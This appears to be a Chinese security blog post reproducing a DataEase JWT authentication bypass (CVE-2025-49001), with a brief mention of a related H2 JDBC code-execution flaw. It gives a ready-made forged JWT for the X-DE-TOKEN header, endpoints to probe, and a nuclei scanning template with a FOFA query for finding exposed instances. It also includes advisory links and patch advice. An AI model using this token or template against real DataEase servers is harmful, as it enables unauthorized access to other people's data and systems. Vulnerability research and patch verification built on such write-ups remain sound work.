【漏洞复现】Dataease JWT 认证绕过漏洞/远程代码执行（CVE-2025-49001/CVE-2025-49002）

PokerSec PokerSec 2025-06-09 01:01

先关注，不迷路

命运总是会安排一些根本不合适的人相遇，目的根本不是让他们与对方相伴，而是让每个人更了解自己，知道自己是什么样的，下一次该去遇见什么样的人    ——《我想要两颗西柚》
i want to see you

****## 免责声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞介绍

DataEase 是一款开源的数据分析平台，提供丰富的数据可视化和分析功能，帮助用户轻松地进行数据探索和决策支持，CVE-2025-49001 是由于JWT校验机制错误导致攻击者可伪造JWT令牌绕过身份验证流程，CVE-2025-49002 是由于H2数据库模块没有严格过滤用户输入的JDBC连接参数，可使用大小写绕过补丁。攻击者可利用这些漏洞实现未授权代码执行，威胁用户数据和系统的安全。

影响版本

DataEase <= 2.10.8

漏洞复现

CVE-2025-49001 

POC:

(这微信页面直接复制代码格式会乱，可以浏览器打开复制)

X-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8

可以通过请求以下接口进行验证，无漏洞则会返回500或401

/de2api/license/version
/de2api/user/info
/de2api/login/refresh

漏洞分析

CVE-2025-49001 

通过 JWT 解密了 token，获取了 uid 和 oid 的值，并没有使用当前秘钥来验证 token 的合法性，可以使用任意secret来伪造一个符合以下格式的JWT token

{
  "uid": 1,
  "oid": 1
}

具体分析见原文

https://github.com/dataease/dataease/security/advisories/GHSA-xx2m-gmwg-mf3r

CVE-2025-49002

https://github.com/dataease/dataease/security/advisories/GHSA-999m-jv2p-5h34

nuclei脚本

id: dataease-cve-2025-49001

info:
  name: dataease-cve-2025-49001-bypass
  author: PokerSec
  severity: high
  metadata:
    fofa-search: title="DataEase"

requests:
  - raw:
      - |-
        GET /de2api/user/info HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        out_auth_platform: default
        X-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"id":"1"'
          - 'oid'
          - 'name'
        condition: and
      - type: status
        status:
          - 200

修复意见

更新至最新安全版本，目前官方已有可更新版本DataEase >= 2.10.10

官方补丁下载地址：

https://github.com/dataease/dataease/releases/tag/v2.10.10

https://dataease.io/

如有侵权，请及时联系删除。